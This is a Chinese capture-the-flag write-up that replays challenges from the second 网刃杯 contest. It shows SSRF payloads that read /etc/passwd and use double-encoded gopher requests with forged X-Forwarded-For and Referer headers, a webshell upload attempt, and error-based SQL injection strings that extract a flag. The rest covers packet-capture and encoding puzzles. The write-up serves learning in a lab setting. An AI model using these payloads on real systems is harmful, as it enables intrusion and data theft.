ssrf_sign_in
ssrf题目 使用Goper协议
可以读文件
?url=file:///etc/passwd
翻一下arp
记录,看看其他web
服务
发现内网ip
172.73.23.100
然后使用gopher
协议post
传参
现在bp
里修改传入的参数
然后进行url编码,然后把%0A
换成%0D%0A
,在进行url编码
因为在传参的时候Gopher会解码一次,然后GET再解码一次
POST%2520/?a=1%2520HTTP/1.1%250D%250AHost:172.73.23.100%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%25203%250D%250A%250D%250Ab=2
提示要本地访问,加XFF头
POST /?a=1 HTTP/1.1
Host:172.73.23.100
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For:127.0.0.1
b=2
在进行转码 替换 二次转码
POST%2520%252F%253Fa%253D1%2520HTTP%252F1.1%250D%250AHost%253A172.73.23.100%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25203%250D%250AX-Forwarded-For%253A127.0.0.1%250D%250A%250D%250Ab%253D2
提示要从bolean.club
访问
添加Referer
字段
POST /?a=1 HTTP/1.1
Host:172.73.23.100
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For:127.0.0.1
Referer:bolean.club
b=2
然后在进行编码 替换 二次转码
POST%2520/?a=1%2520HTTP/1.1%250D%250AHost:172.73.23.100%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%25203%250D%250AX-FORWARDED-FOR:%2520127.0.0.1%250D%250AReferer:bolean.club%250D%250A%250D%250Ab=2
upload
文件上传,首先传一个一句话木马
提示需要ctf
类型的文件
修改文件类型为ctf
显示成功上传,但是不解析文件,尝试其他方法,题目描述中存在sql描述
尝试sql注入
文件名出存在sql注入
尝试报错注入
id='and(select extractvalue(1,concat('~',(select database()))))#
提示语句错误
这里要在 #
前面加一个)
'and(select extractvalue(1,concat('~',(select database())))))#
或者
'and(select extractvalue(1,concat('~',(select database())))) and '
尝试直接读取flag
'and(select extractvalue(1,concat('~',(select flag from flag)))))#
只能看到flag
的前几位,读取后几位
'and(select extractvalue(1,concat('~',substr((select flag from flag),29,60)))))#
easyisc
用wireshark
打开追踪TCP
流
xyp07
解压密码在压缩包注释中
密码:Xyp77&7&77
用wireshark
打开
使用base91
解码
iPE=e>we,9:={]RnBjf<7_8Cw1b
flag{welcome_S7_world_xyp07}
移动的黑客
010
打开文件头异常
修改前四位内容
FF FF FF FF -> 0A 0D 0D 0A
打开之后找转速大于1000
的内容
因为1000
的十六进制
是2710
所以找大于2710
的数据包
在68156
处找到data
数据大于2710
的数据
hex(2766)=10086
所以flag
是
flag{1008668156}
ncsubj
打开数据包进行分析查看,追踪TCP
流发现了三段疑似Base64
字符串
anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA==
j|u|n|g|n|a|p|f|h|o|w|r|p|g|
使用随波逐流解码
是rot13
加密
w|h|a|t|a|n|c|s|u|b|j|e|c|t|
flag{whatancsubject}
carefulguy
打开数据包进行分析查看,追踪TCP流
发现了该位置一直存在数字,疑似16进制
,将其每个流的摘取出 来排除其中is a flag
和@
那一部分
666c61677b7034757333313576337279316e7433726573746963397d
flag{p4us315v3ry1nt3restic9}
总结
以上就是对网刃杯Ⅱ
的部分复现,
相比于网刃杯Ⅰ
,第二届的题目质量有很大的提升,ctfer的质量也有不同程度的提高,
最后就是还是很菜啊,
继续加油。